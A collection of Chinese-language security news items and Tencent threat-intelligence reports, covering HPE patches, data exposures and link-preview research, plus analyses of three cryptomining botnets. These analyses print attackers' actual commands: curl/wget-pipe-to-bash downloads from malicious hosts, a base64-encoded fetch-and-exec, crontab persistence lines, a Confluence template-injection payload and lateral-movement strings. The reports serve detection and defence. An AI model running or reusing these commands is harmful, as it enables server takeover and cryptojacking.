Hewlett Packard Enterprise发布了针对两个关键漏洞的补丁程序，一个漏洞在StoreServ管理控制台中被确认，另一个漏洞则影响了BlueData EPIC软件平台和Ezmeral容器平台。 最严重的问题存在于HPE StoreServ管理控制台（SSMC）3.7.0.0中，CVE-2020-7197漏洞可以利用远程绕过身份验证保护，其CVSS评分为10。SSMC是基于节点的Web控制台，它为多个阵列的管理提供支持，通常安装在Linux或Windows服务器上，并与托管列上的数据隔离。该漏洞可能使黑客无需身份验证，直接获得对应用程序的访问权限。 MindPoint Group的Elwood Buck报告了规避远程身份验证的情况。根据HPE的说法，3.7.0.0之前的HP 3PAR StoreServ Management和Core Software Media受到影响。HPE建议受影响的用户将软件升级到HP 3PAR StoreServ3.7.1.1或更高版本。在BlueData EPIC软件平台版本4.0和更早版本以及Ezmeral Container Platform 5.0中确定了第二个漏洞CVE-2020-7196，其CVSS评分为9.9。HPE解释说，问题在于这两个应用程序“都使用不安全方法来处理Kerberos密码，导致密码容易受到未经授权的拦截和/或检索。” HPE建议将相关软件更新至Ezmeral Container Platform 5.1或更高版本。除此之外，HPE还在上周发布了针对Aruba CX交换机、Aruba AirWave Glass和其他Aruba产品中的几个高危漏洞的补丁程序。       消息来源：securityweek；封面来自网络；译者：小江。 本文由 HackerNews.cc 翻译整理。 转载请注明“转自 HackerNews.cc ” 并附上原文链接。

被诸多 WeWork 员工用于访问打印机设置的共享账户使用了非常简单的密码，以至于他们的客户都猜出来了。在伦敦 WeWork 办公的 Jake Elsley 表示之所以能发现这个密码，是因为他所在地区的 WeWork 员工在办公之后没有及时登出而发现的。 像 Elsley 这样的客户会被分配到一个七位数的用户名称和四位数的密码，用于在 WeWrok 办公场所打印密码。但是，WeWork 的员工所使用的用户名称是“9999”四位数，然后 Elsley 猜测使用了和用户名称相同的密码，随后他们成功以 9999 作为账号和密码登录。 WeWork 社区经理使用“9999”账号来监管每个地区的每日打印情况，不过想要访问这些打印的文档，需要使用客户账号。Elsley 说，“9999”帐户看不到文件名以外的文档内容，但是登录到 WeWork 打印管理终端，允许将这个打印任务分配给该网络内的其他 WeWork 打印机。 WeWork 发言人 Colin Hart 说：“WeWork 致力于保护我们的成员和员工的隐私和安全。我们立即对这一潜在问题进行了调查，并采取了措施解决任何问题。我们还将将所有打印功能升级为一流的安全性和体验解决方案，历时数月，即将结束。我们预计该过程将在未来几周内完成。”     （消息及封面来源：cnBeta）

感谢腾讯御见威胁情报中心来稿！ 原文链接：https://mp.weixin.qq.com/s/953ZHaf8IjLGyxB3tWSoDQ 一、概述 腾讯安全威胁情报中心检测到永恒之蓝下载器木马新增利用Hadoop Yarn未授权访问漏洞攻击。该变种入侵Linux服务器后下载门罗币挖矿木马，然后将挖矿任务进行持久化、清除竞品挖矿木马，并通过SSH爆破横向移动。 永恒之蓝下载器木马自2018年底出现以来，一直处于活跃状态。该病毒不断变化和更新攻击手法，从最初只针对Windows系统扩大攻击范围到Linux系统。截止目前，其攻击手法已涵盖弱口令爆破、系统漏洞利用、Web漏洞利用等，其中利用SSH、Redis、Hadoop Yarn服务的攻击方式可能对云主机以及云上业务造成较大威胁。其主要入侵方式列表如下： 腾讯安全系列产品针对永恒之蓝下载器木马最新变种的响应清单如下 ： 应用场景 安全产品 解决方案 威胁情报 腾讯T-Sec 威胁情报云查服务 （SaaS） 1）永恒之蓝下载器木马黑产团伙相关IOCs已入库。 各类安全产品可通过“威胁情报云查服务”提供的接口提升威胁识别能力。可参考:https://cloud.tencent.com/product/tics 腾讯T-Sec 高级威胁追溯系统 1）永恒之蓝下载器木马黑产团伙相关信息和情报已支持检索。 网管可通过威胁追溯系统，分析日志，进行线索研判、追溯网络入侵源头。T-Sec高级威胁追溯系统的更多信息，可参考：https://cloud.tencent.com/product/atts 云原生安全防护 云防火墙 （Cloud Firewall，CFW） 基于网络流量进行威胁检测与主动拦截，已支持： 1）永恒之蓝漏洞MS17-010; 2）SMBGhost漏洞CVE-2020-0796; 3）Redis未授权访问漏洞; 4）Hadoop Yarn未授权访问漏洞   有关云防火墙的更多信息，可参考：  https://cloud.tencent.com/product/cfw 腾讯T-Sec  主机安全 （Cloud Workload Protection，CWP） 已支持检测： 1）永恒之蓝漏洞MS17-010; 2）SMBGhost漏洞CVE-2020-0796; 3）Redis未授权访问漏洞; 4）Hadoop Yarn未授权访问漏洞   腾讯主机安全（云镜）提供云上终端的防毒杀毒、防入侵、漏洞管理、基线管理等。关于T-Sec主机安全的更多信息，可参考：https://cloud.tencent.com/product/cwp 腾讯T-Sec 网络资产风险监测系统 （腾讯御知） 1）腾讯御知已支持监测全网资产是否受永恒之蓝漏洞MS17-010、SMBGhost漏洞CVE-2020-0796影响。 2）已集成无损检测POC，企业可以对自身资产进行远程检测。 关于腾讯T-Sec网络资产风险监测系统的更多信息，可参考：https://s.tencent.com/product/narms/index.html 腾讯T-Sec 安全运营中心 基于客户云端安全数据和腾讯安全大数据的云安全运营平台。已接入腾讯主机安全（云镜）、腾讯御知等产品数据导入，为客户提供漏洞情报、威胁发现、事件处置、基线合规、及泄漏监测、风险可视等能力。 关于腾讯T-Sec安全运营中心的更多信息，可参考：https://s.tencent.com/product/soc/index.html 非云企业安全防护 腾讯T-Sec 高级威胁检测系统 （腾讯御界） 基于网络流量进行威胁检测，已支持检测： 1）永恒之蓝漏洞MS17-010; 2）SMBGhost漏洞CVE-2020-0796; 3）Redis未授权访问漏洞; 4）Hadoop Yarn未授权访问漏洞   关于T-Sec高级威胁检测系统的更多信息，可参考： https://cloud.tencent.com/product/nta 腾讯T-Sec终端安全管理系统（御点） 1）可查杀永恒之蓝下载器木马团伙入侵释放的后门木马、挖矿木马程序； 2）已支持检测黑产利用永恒之蓝漏洞MS17-010、SMBGhost漏洞CVE-2020-0796入侵相关的网络通信。 3）已支持检测利用Lnk漏洞CVE-2017-8464、Office漏洞CVE-2017-8570攻击的病毒程序；   腾讯御点提供企业终端的防毒杀毒、防入侵、漏洞管理、基线管理等能力，关于T-Sec终端安全管理系统的更多资料，可参考：https://s.tencent.com/product/yd/index.html 二、详细分析 Hadoop是一个由Apache基金会所开发的分布式系统基础架构，YARN是hadoop系统上的资源统一管理平台，其主要作用是实现集群资源的统一管理和调度，可以把MapReduce计算框架作为一个应用程序运行在YARN系统之上，通过YARN来管理资源。用户可以向YARN提交特定应用程序进行执行，其中就允许执行相关包含系统命令。 YARN提供有默认开放在8088和8090的REST API（默认前者）允许用户直接通过API进行相关的应用创建、任务提交执行等操作，如果配置不当，REST API将会开放在公网导致未授权访问的问题，攻击者可以在未授权的情况下远程执行代码。 永恒之蓝下载器木马变种在yarnexec()函数中对yarn未授权访问漏洞进行利用。 攻击成功后执行远程命令： export src=yarn;curl -fsSL t.amynx.com/ln/core.png?yarn|bash core.png首先下载门罗币挖矿木马d.ackng.com/ln/xr.zip并启动挖矿进程/.Xll/xr，然后添加crontab定时任务将挖矿作业持久化。 清除竞品挖矿木马： 利用SSH爆破进行横向移动： 永恒之蓝下载器木马历次版本更新情况如下：  IOCs URL http[:]//d.ackng.com/ln/xr.zip http[:]//t.amynx.com/ln/core.png http[:]//t.amynx.com/ln/a.asp http[:]//t.jdjdcjq.top/ln/a.asp MD5 if.bin 888dc1ca4b18a3d424498244acf81f7d a.jsp(powershell) c21caa84b327262f2cbcc12bbb510d15 kr.bin e04acec7ab98362d87d1c53d84fc4b03 core.png e49367b9e942cf2b891f60e53083c938 a.jsp(shell) b204ead0dcc9ca1053a1f26628725850 gim.jsp b6f0e01c9e2676333490a750e58d4464 矿池： lplp.ackng.com:444 参考链接： 1. Hadoop Yarn REST API未授权漏洞利用挖矿分析 https://www.freebuf.com/vuls/173638.html 2. 关于Apache Hadoop Yarn资源管理系统REST API未授权漏洞通知 https://bbs.qcloud.com/thread-50090-1-1.html 3. 永恒之蓝下载器最新变种重启EXE文件攻击，新变种已感染1.5万台服务器 https://s.tencent.com/research/report/1038.html 4.https://github.com/vulhub/vulhub/blob/master/hadoop/unauthorized-yarn/exploit.py （封面来自网络）

据外媒TechCrunch报道，True自称是一款能够“保护你的隐私”的社交网络应用。但由于安全漏洞，该公司的一台服务器却曝光了用户私人数据。这款应用于2017年由Hello Mobile推出，Hello Mobile是一家虚拟手机运营商，依附于T-Mobile的网络。 True官方网站介绍称，公司已经筹集到1400万美元的种子基金并称在推出后不久就拥有超50万名的用户。 但该应用的一个数据库的控制面板在没有密码的情况下被暴露在网上，其允许任何人阅读、浏览和搜索该数据库–其中包括私人用户数据。 迪拜网络安全公司SpiderSilk的首席安全长Mossab Hussein发现了这个被暴露的控制面板并向TechCrunch提供了详细信息。来自搜索引擎BinaryEdge提供的数据显示，该曝光早在9月初就已经发生。 在TechCrunch联系True之后，这家公司对控制面板进行了离线处理。 True CEO Bret Cox虽然向Techcrunch证实了安全漏洞的存在，但并没有回答他们提出的具体问题，包括该公司是否计划通知用户存在安全漏洞或否计划根据州数据泄露通知法向监管机构披露该事件。 据了解，控制面板包含了从今年2月开始的每日服务器日志，像用户注册的电子邮件地址或电话号码、用户之间的私人帖子和消息内容以及用户最后已知的地理位置–这些地理位置则可以识别用户过去或曾经的位置。另外，控制面板还会暴露用户上传的电子邮件和电话联系方式，True会在应用中使用这些信息来匹配已知的朋友。并且这些数据都没有进行加密处理。 TechCrunch通过创建一个测试账号并要求Hussein提供只有他们自己知道的数据如注册账号时使用的电话号码确认了这一情况。 Hussein指出，控制面板还对外泄露了账号访问令牌，这些令牌可以用来入侵和劫持任何用户的账号。虽然这些账号访问令牌看起来像一行随机的字母和数字，但用户无需每次输入就可以登录到应用中。Hussein就使用TechCrunch的测试帐号在控制面板中找到了后者的访问令牌，并使用它访问其帐号并在上面发布消息。 此外，控制面板还显示了一次性登录代码，True会将这些代码发送到与账号关联的电子邮件地址或电话号码，而不是存储密码。 True表示，在删除账号后与其有关的所有内容都会从该公司的服务器被清除。然而TechCrunch经过测试发现事实并非如此，他们仍可以在控制面板上搜索到其私人信息、帖子和照片等。 目前，TechCrunch无法联系到Hello Mobile的发言人。     （消息及封面来源：cnbeta）

链接预览几乎是主流聊天和即时信息应用中标配的功能，它能预览链接中关联的图像和文本，从而让在线对话更加轻松。但遗憾的是，它们还可能会泄漏我们的敏感数据、消耗我们有限的带宽、耗尽我们的电池，甚至在某些情况下能够暴露原本应该端到端加密的聊天内容。根据本周一发布的研究，目前 Facebook，Instagram，LinkedIn 和 Line 中的信息就存在这样的问题。 当发送者发送了一条包含链接的信息，应用可能会显示该链接随附的文本（通常是标题）和图像，通常看起来会是下面这样的： 为此，应用程序本身（或由应用程序指定的代理）必须要先访问该链接，打开文件，并调查其中的内容。而在这个过程中可能会下载恶意程序。其他形式的恶意行为可能会迫使应用下载太大的文件，以至于导致应用崩溃，耗尽电池或消耗有限的带宽。而且，如果链接指向私人材料（例如，将报税表发布到私人OneDrive或DropBox帐户），则应用服务器可以无限期查看和存储它。 本周一，安全研究人员塔拉尔·哈吉·巴克里（Talal Haj Bakry）和汤米·迈斯克（Tommy Mysk）发现，Facebook Messenger 和 Instagram 在方面的表现比较糟糕。如下图所示，两个应用程序都会下载并复制整个链接文件，即使文件大小为千兆字节也是如此。同样，如果文件是用户希望保密的文件，则可能会引起关注。 即使链接的文件容量高达 2.6 GB，在 Facebook Messenger 和 Instagram 两款应用中发送链接预览之后依然会进行下载。 Haj Bakry 和 Mysk 向Facebook报告了他们的发现，该公司表示这两个应用程序都可以正常工作。 Instagram 的所有者 Facebook 在一封电子邮件中说，其服务器仅下载图像的缩小版本，而不下载原始文件，并且该公司不存储该数据。 但是 Mysk 表示，该视频演示了 Instagram 全部下载了 2.6GB 文件（Ubuntu ISO，文件重命名为ubuntu.png ）。他还指出，大多数其他 Messenger 会剥离 JavaScript，而不是下载并在其服务器上运行。LinkedIn的表现略好。唯一的区别是，它没有复制任何大小的文件，而是仅复制了前50兆字节。 同时，当 Line 应用程序打开加密消息并找到链接时，它似乎会将链接发送到 Line 服务器以生成预览。Haj Bakry 和 Mysk 写道：“我们认为这违反了端到端加密的目的，因为LINE服务器知道通过应用程序发送的所有链接，以及谁与谁共享链接。” Discord，Google Hangouts，Slack，Twitter和Zoom也会复制文件，但它们将数据量限制在15MB到50MB之间。上图提供了研究中每个应用程序的比较。     （消息来源：cnBeta；封面来自网络）  

感谢腾讯御见威胁情报中心来稿！ 原文链接：https://mp.weixin.qq.com/s/zviLvGK3wTnl0iwtszHQlg   一、概述 腾讯主机安全（云镜）捕获WatchBogMiner挖矿木马最新变种对云主机的攻击，该变种利用Apache Flink任意Jar包上传导致远程代码执行漏洞入侵云主机，然后下载文件名为“watohdog”的门罗币挖矿木马。 该挖矿木马最初的版本是针对Linux服务器利用Nexus Repository Manager、Supervisord、ThinkPHP等服务器组件的远程代码执行漏洞进行攻击。根据其最初下载的挖矿木马文件名，将其命名为“Watchbog”挖矿木马。 腾讯安全近期检测到“Watchbog”挖矿木马的最新变种开始利用Redis未授权访问漏洞、Apache Flink远程代码执行漏洞入侵传播，根据其算力推测，该变种已控制约8000台服务器挖矿，挖矿收益折合人民币约1.2万元。 腾讯安全系列产品应对WatchBogMiner最新变种的响应清单如下： 应用场景 安全产品 解决方案  威胁情报 腾讯T-Sec 威胁情报云查服务 （SaaS） 1）WatchBogMiner黑产团伙相关IOCs已入库。 各类安全产品可通过“威胁情报云查服务”提供的接口提升威胁识别能力。可参考:https://cloud.tencent.com/product/tics 腾讯T-Sec 高级威胁追溯系统 1）WatchBogMiner黑产团伙相关信息和情报已支持检索。 网管可通过威胁追溯系统，分析日志，进行线索研判、追溯网络入侵源头。T-Sec高级威胁追溯系统的更多信息，可参考：https://cloud.tencent.com/product/atts 云原生安全防护 云防火墙 （Cloud Firewall，CFW） 基于网络流量进行威胁检测与主动拦截，已支持检测： 1）WatchBogMiner关联的IOCs； 2）Nexus Repository Manager 3远程代码执行漏洞(CVE-2019-7238)  ； 3）Supervisord远程命令执行漏洞(CVE-2017-11610)； 4）ThinkPHP远程命令执行漏洞； 5）Apache FLink未授权上传jar包远程代码执行漏洞； 6）Redis未授权访问漏洞。   有关云防火墙的更多信息，可参考：https://cloud.tencent.com/product/cfw 腾讯T-Sec  主机安全 （Cloud Workload Protection，CWP） 腾讯主机安全（云镜）已支持检测： 1）WatchBogMiner相关木马程序； 2）Nexus Repository Manager 3 远程代码执行漏洞(CVE-2019-7238)  ； 3）Supervisord远程命令执行漏洞(CVE-2017-11610)； 4）ThinkPHP远程命令执行漏洞； 5）Apache FLink未授权上传jar包远程代码执行漏洞； 6）Redis未授权访问漏洞。   腾讯主机安全（云镜）提供云上终端的防毒杀毒、防入侵、漏洞管理、基线管理等。关于T-Sec主机安全的更多信息，可参考：https://cloud.tencent.com/product/cwp 腾讯T-Sec 安全运营中心 基于客户云端安全数据和腾讯安全大数据的云安全运营平台。已接入腾讯主机安全（云镜）、腾讯御知等产品数据导入，为客户提供漏洞情报、威胁发现、事件处置、基线合规、及泄漏监测、风险可视等能力。 关于腾讯T-Sec安全运营中心的更多信息，可参考：https://s.tencent.com/product/soc/index.html 非云企业安全防护 腾讯T-Sec 高级威胁检测系统 （腾讯御界） 腾讯御界基于网络流量进行威胁检测，已支持检测： 1）Nexus Repository Manager 3 远程代码执行漏洞(CVE-2019-7238)  ； 2）Supervisord远程命令执行漏洞(CVE-2017-11610)； 3）ThinkPHP远程命令执行漏洞； 4）Apache FLink未授权上传jar包远程代码执行漏洞； 5）Redis未授权访问漏洞。   关于T-Sec高级威胁检测系统的更多信息，可参考：https://cloud.tencent.com/product/nta 二、详细分析 Apache Flink核心是一个流式的数据流执行引擎，其针对数据流的分布式计算提供了数据分布、数据通信以及容错机制等功能。基于流执行引擎，Apache Flink提供了诸多更高抽象层的API以便用户编写分布式任务。 2019年11月Aapche Flink被爆出漏洞，攻击者可直接在Apache Flink中上传任意jar包，从而达到远程代码执行的目的。漏洞POC代码已被公开：https://github.com/LandGrey/flink-unauth-rce 攻击者首先利用Flink漏洞上传恶意jar包： 然后执行远程命令： /bin/bash -c (curl -s http[:]//nabladigital.biz/img/ddxox.png||wget -q -O- http[:]//nabladigital.biz/img/ddxox.png)|bash 其中ddxox.png代码: nohup bash -c '(curl -fsSL http[:]//nabladigital.biz/img/sghbw.png||wget -q -O- http[:]//nabladigital.biz/img/sghbw.png)|bash' > /dev/null 2>&1 &rm -rf /tmp/seele* sghbw.png代码: (curl -fsSL http[:]//nabladigital.biz/img/afhpo.png||wget -q -O - http[:]//nabladigital.biz/img/afhpo.png)|base64 -d|bash 最终执行的afhpo.png首先定义三个变量house、park、room house=http[:]//nabladigital.biz/img/ddxox.png park= https[:]//files.catbox.moe/5j9zcz room= https[:]//a.pomf.cat/wariie 然后crontab命令创建定时任务，每10分钟下载执行一次以上脚本： (crontab -l 2>/dev/null; echo "*/10 * * * * (curl -fsSL $house||wget -q -O- $house||curl -fsSL $park||wget -q -O- $park||curl -fsSLk $room||wget -q -O- $room)|bash > /dev/null 2>&1")| crontab – 通过写入以下文件创建定时任务： /etc/cron.d/root /etc/cron.d/system /etc/cron.d/apache /var/spool/cron/crontabs/root /var/spool/cron/root 接着下载挖矿木马http[:]//nabladigital.biz/img/qczgb.png，base64解码后保存至目录/tmp/systemd-private-64aa0008dfb47a84a96f7974811b772f-systemd-timesyncd.service-TffNff/tmp/watohdog（之前的版本，该文件名为watchbog）。 watohdog是XMRig经过修改编译的挖矿程序。 矿池：104.140.201.42:3333 钱包： 489cbwS5qsKFsNphUjABEyEvLCJWb3e9YDg5BE94MmyeGEbLQhK5DsSMEBGKo Ccvbg4oEjCWyRx21gu9XAo6QkhgNfkryRd 收益：已挖矿获得门罗币13.82XMR，折合人民币约1.2万元。平均算力103 KH/s，以此推算Watchbog最新变种已控制约8000台服务器挖矿。 IOCs Domain nabladigital.biz URL http[:]//nabladigital.biz/img/ddxox.png http[:]//nabladigital.biz/img/sghbw.png http[:]//nabladigital.biz/img/afhpo.png http[:]//nabladigital.biz/img/qczgb.png https[:]//files.catbox.moe/5j9zcz https[:]//a.pomf.cat/wariie MD5 Watohdog 1df8307ae2d2524628b1322ac864d96c ddxox.png 791e8ecf4dee71dd0e0da129b938258f sghbw.png ef5323cac300f68fb77ac23c39236bf2 afhpo.png 9ef94e8b41893c4b1a85c327a3bcae3f 钱包： 489cbwS5qsKFsNphUjABEyEvLCJWb3e9YDg5BE94MmyeGEbLQhK5DsSMEBGKo Ccvbg4oEjCWyRx21gu9XAo6QkhgNfkryRd 参考链接： 1. Apache Flink任意Jar包上传导致远程代码执行 https://mp.weixin.qq.com/s/ArYCF4jjhy6nkY4ypib-Ag 2. Apache Flink 任意 Jar 包上传导致远程代码执行漏洞复现 https://cloud.tencent.com/developer/article/1544254 （封面来自网络）

在诺基亚最新发布的《Threat Intelligence Report》中，表示由于在安全方面存在的诸多隐患，导致与互联网连接设备日益受到攻击威胁。该报告称，目前物联网设备感染率达到了 33%，高于 2019 年的 16%。 根据该报告，受影响最大的物联网设备是那些常规分配给公众的互联网IP地址的设备。它强调指出，由于网络扫描看不到易受攻击的设备，因此使用运营商级网络地址转换的网络看到 IoT 设备的感染率大大降低。 诺基亚软件总裁兼首席数字官Bhaskar Gorti在评论报告中的发现时说：“ 5G 生态系统中正在发生的巨大变化，随着到 2021 年在全球范围内部署更多5G网络，为恶意行为者利用物联网设备中的漏洞提供了充足的机会。该报告不仅增强了消费者和企业加强自身网络保护实践的迫切需求，而且还对物联网设备生产商提供了更高需求。”     （消息来源：cnBeta； 封面来自网络）

据外媒报道，没有一家慈善机构愿意拒绝捐款尤其是在资金短缺的情况下。但如果捐款来自一个令人惊讶的来源–黑客呢？虽然这听起来像是现代版的罗宾汉–通过电子手段盗取公司的资金然后通过比特币将其数字化返还给慈善机构–但当这些资金来自犯罪收益时，法律做出了明确规定：必须拒绝。 当这个慈善机构不知道钱是谁捐的、钱是从谁那里被偷的也不知道如何归还的时候又该怎么做呢？ 上周，网络犯罪集团Darkside就将两家美国慈善机构置于了这样一个不幸的境地。该集团透露，它向Children International和Water Project捐赠了0.88比特币，价值1万美元。 该组织在其网站上发布了一篇相关“新闻稿”。 Comparitech.com安全专家Brian Higgins表示，此举只是Darkside为了吸引来自外界的注意。“首先，跟他们多年来从受害者那里勒索的巨额资金相比，1万美元只是一个小钱，所以这算不上什么大慈善行为。其次，没有一家可靠的慈善机构会接受明显来自犯罪的捐款。有一种很小的可能性，这是一种测试，看看他们是否能以某种方式洗干净他们的犯罪收益，但更有可能的是，Darkside显然有太多的时间，他们的比特币钱包里有太多偷来的钱。如果他们真的想‘让世界变得更美好’，他们就会卖掉笔记本电脑，远离互联网。” 据了解，Darkside主营给电脑加密并由此牟取暴利的勒索软件开发工作。 Children International表示：“我们意识到了这种情况并正在进行内部研究；这对我们来说还是第一次（遇到这种情况）。如果这笔捐款跟黑客有关，我们将无意保留它。” 在最初的媒体报道了该组织的捐款后，Darkside更新了它的帖子并发出警告。负责报道的Giving Block被告知，这笔钱是通过一个mixer发送的，这是一种自动洗钱的形式，其模糊了比特币的真正发送者和接收者。另外，它还警告称，对其捐款的报道只会损害处理捐款的公司以及收到捐款的公司。 据了解，这些慈善捐款是Darkside怪异的品牌宣传活动的一部分，其目的是将自己塑造成不同于普通罪犯的形象。该组织在8月份开始运营时发布的一份意向声明中表示：“我们之所以创造了DarkSide，是因为我们还没有找到适合自己的完美产品。但现在我们有了。” 该组织表示，根据他们的原则，其不会攻击医院、学校、政府或慈善机构，“我们只攻击那些能够支付要求金额的公司，我们不想毁掉你们的生意。在受到攻击之前，我们会仔细分析你的会计工作，根据你的净收入来决定你能支付多少。” 至少在某种程度上，它确实不同于以前的许多勒索软件。除了对电脑进行加密，该机构还会将黑客入侵的数据上传到自己的服务器上，如果赎金没有及时支付，该机构就会将全部内容发布到服务器上。     （消息来源：cnbeta；封面来自网络）

感谢腾讯御见威胁情报中心来稿！ 原文链接：https://mp.weixin.qq.com/s/NVm1jLRy8on0IdnK0ZOwwQ   腾讯安全接到用户求助，报告腾讯云主机安全（云镜）网络防御功能检测到攻击事件。腾讯安全专家通过攻击日志分析，发现这是8220挖矿团伙最新变种针对企业云服务器的攻击活动，该用户对腾讯主机安全（云镜）日志告警及时处置，已彻底消除该挖矿团伙的威胁。 一、背景 腾讯安全接到用户求助，报告腾讯云主机安全（云镜）网络防御功能检测到攻击事件。腾讯安全专家通过攻击日志分析，发现这是8220挖矿团伙最新变种针对企业云服务器的攻击活动，该用户对腾讯主机安全（云镜）日志告警及时处置，已彻底消除该挖矿团伙的威胁。 腾讯主机安全（云镜）检测网络攻击 在此次攻击活动中，发现8220挖矿团伙首次使Nexus Repository Manager 3远程代码执行漏洞CVE-2019-7238、Confluence 远程代码执行漏洞CVE-2019-3396攻击入侵，并在入侵后会尝试利用多个SSH爆破工具进行横向移动，最终在失陷系统植入挖矿木马以及Tsunami僵尸网络病毒。 腾讯安全研究人员分析发现，此次利用Nexus Repository Manager 3和Confluence Server高危漏洞的攻击来源为8220挖矿团伙，此次入侵后将核心shell程序xms下载到感染机器上执行，xms会尝试卸载安全软件，杀死竞品挖矿木马进程，关闭Linux防火墙、设置最大线程和内存页以保证挖矿时对机器资源的充分利用。 在横向移动阶段，8220挖矿团伙利用多个攻击程序对目标机器进行SSH爆破，攻击成功后上传木马程序并执行远程命令。执行Payload除了下载xms脚本的命令外，还会执行Python脚本代码d.py或dd.py（取决于C2域名bash.givemexyz.in是否可用）下载挖矿木马以及Tsunami僵尸程序，并且通过安装crontab定时任务和系统初始化脚本进行本地持久化，入侵攻击流程如下： 8220挖矿变种攻击流程 8220挖矿团伙自2017年左右开始活跃，攻击目标包括Windows以及Linux服务器，该团伙早期会利用Docker镜像传播挖矿木马，后来又逐步利用Redis未授权访问漏洞、Kubernetes未授权访问漏洞、JBoss漏洞（CVE-2017-12149）、Weblogic漏洞（CVE-2017-10271）、Couchdb漏洞（CVE-2017-12635和CVE-2017-12636）、Drupal漏洞（CVE-2018-7600）、Hadoop Yarn未授权访问漏洞、Apache Struts漏洞（CVE-2017-5638）、Tomcat服务器弱口令爆破进行攻击，并且在2020年被发现开始通过SSH爆破进行横向攻击传播。 腾讯安全系列产品针对8220挖矿团伙最新行动的响应清单如下： 应用场景 安全产品 解决方案 威 胁 情 报 腾讯T-Sec 威胁情报云查服务 （SaaS） 1）8220挖矿团伙相关IOCs已入库。 各类安全产品可通过“威胁情报云查服务”提供的接口提升威胁识别能力。可参考:https://cloud.tencent.com/product/tics 腾讯T-Sec 高级威胁追溯系统 1）8220挖矿团伙相关信息和情报已支持检索。 网管可通过威胁追溯系统，分析日志，进行线索研判、追溯网络入侵源头。T-Sec高级威胁追溯系统的更多信息，可参考：https://cloud.tencent.com/product/atts 云原生安全 防护 云防火墙 （Cloud Firewall，CFW） 1）基于网络流量进行威胁检测与主动拦截，已支持： 8220挖矿团伙关联的IOCs识别检测； 2）检测以下类型漏洞利用：Struts2漏洞利用、Weblogic漏洞利用、Drupal漏洞利用、Tomcat漏洞利用、JBoss漏洞利用、Confluence漏洞利用、Nexus Repository Manager 3漏洞利用 有关腾讯云防火墙的更多信息，可参考： https://cloud.tencent.com/product/cfw 腾讯T-Sec  主机安全 （Cloud Workload Protection，CWP） 1）已支持查杀8220挖矿团伙相关木马程序； 2）检测以下漏洞：Apache Struts2漏洞CVE-2017-5638、WebLogic 漏洞CVE-2018-2628、WebLogic 漏洞CVE-2017-10271、Tomcat漏洞CVE-2017-12615、Drupal漏洞CVE-2018-7600、CouchDB权限绕过漏洞利用(CVE-2017-12635,CVE-2017-12636)、Confluence 未授权远程代码执行漏洞(CVE-2019-3396)、Nexus Repository Manager 3 远程代码执行漏洞(CVE-2019-7238) 腾讯主机安全（云镜）提供云上终端的防毒杀毒、防入侵、漏洞管理、基线管理等。关于T-Sec主机安全的更多信息，可参考：https://cloud.tencent.com/product/cwp 腾讯T-Sec 安全运营中心 基于客户云端安全数据和腾讯安全大数据的云安全运营平台。已接入腾讯主机安全（云镜）、腾讯御知等产品数据导入，为客户提供漏洞情报、威胁发现、事件处置、基线合规、及泄漏监测、风险可视等能力。 关于腾讯T-Sec安全运营中心的更多信息，可参考：https://s.tencent.com/product/soc/index.html 非云企业安全防护 腾讯T-Sec 高级威胁检测系统 （腾讯御界） 1）已支持通过协议检测8220挖矿团伙与服务器的网络通信； 2）检测以下漏洞利用：Apache Struts2漏洞CVE-2017-5638、WebLogic 漏洞CVE-2018-2628、WebLogic 漏洞CVE-2017-10271、Tomcat漏洞CVE-2017-12615、Drupal漏洞CVE-2018-7600、JBoss漏洞CVE-2017-12149、CouchDB权限绕过漏洞利用(CVE-2017-12635,CVE-2017-12636)、Confluence 未授权远程代码执行漏洞(CVE-2019-3396)、Nexus Repository Manager 3 远程代码执行漏洞(CVE-2019-7238) 关于T-Sec高级威胁检测系统的更多信息，可参考： https://cloud.tencent.com/product/nta 二、详细分析 1.网络入侵 Nexus Repository Manager 3中存在CVE-2019-7238远程代码执行漏洞，影响版本Nexus Repository Manager OSS/Pro 3.6.2 到 3.14.0，腾讯云安全团队于2019年2月13日发现并上报了该漏洞。 攻击者构造请求对运行Nexus Repository Manager 3的主机进行攻击，执行恶意命令传播挖矿程序，该攻击活动被腾讯主机安全（云镜）网络防御模块检测告警。 执行shell命令如下： rm -rf /tmp/.python; curl -s http://205.185.116.78/xms | bash -sh; wget -q -O - http://205.185.116.78/xms | bash -sh; echo cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8yMDUuMTg1LjExNi43OC9kLnB5IikucmVhZCgpKSc= | base64 -d | bash -; lwp-download http://205.185.116.78/xms /tmp/xms; bash /tmp/xms; rm -rf /tmp/xms Confluence Server和Confluence Data Center产品中使用的widgetconnecter组件(版本<=3.1.3)中存在服务器端模板注入(SSTI)漏洞CVE-2019-3396。攻击者可以利用该漏洞实现对目标系统进行远程代码执行(RCE)。 8220挖矿团伙于2020年10月15日上传了攻击Payload: ftp[:]//205.185.116.78/x.vm x.vm代码： #set($e="e")$e.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec("wget http[:]//205.185.116.78/xms -O /tmp/xms")$e.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec("bash /tmp/xms")$e.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec("curl -O /tmp/xms http[:]//205.185.116.78/xms")$e.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec("bash /tmp/xms")$e.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec("lwp-download http[:]//205.185.116.78/xms /tmp/xms")$e.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec("bash /tmp/xms")$e.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,nul 2.核心shell 为了达到最大化占用内存资源进行挖矿的目的，xms首先进行以下设置： setenforce 0 设置SELinux 成为permissive模式，临时关闭Linux防火墙，通过ulimit设置最大线程，通过vm.nr_hugepages设置最大内存页提高内存性能。 1.setenforce 0 2>/dev/null2.ulimit -u 500003.sysctl -w vm.nr_hugepages=$((`grep -c processor /proc/cpuinfo` * 3)) 然后通过搜索端口号、矿池IP地址找到并杀死竞品挖矿进程： 杀死竞品挖矿进程 试图卸载阿里云骑士、腾讯云镜，该段代码目前被屏蔽，推测是黑客担心卸载行为被检测到。 卸载安全软件 从ifconfig中获取IP地址备用。 获取IP地址 通过Ping命令测试矿池域名DNS是否成功。 测试矿池域名 设置横向移动攻击时的Payload: payload="(curl -fsSL http://198.98.57.217/xms||wget -q -O- http://198.98.57.217/xms)|bash -sh; echo 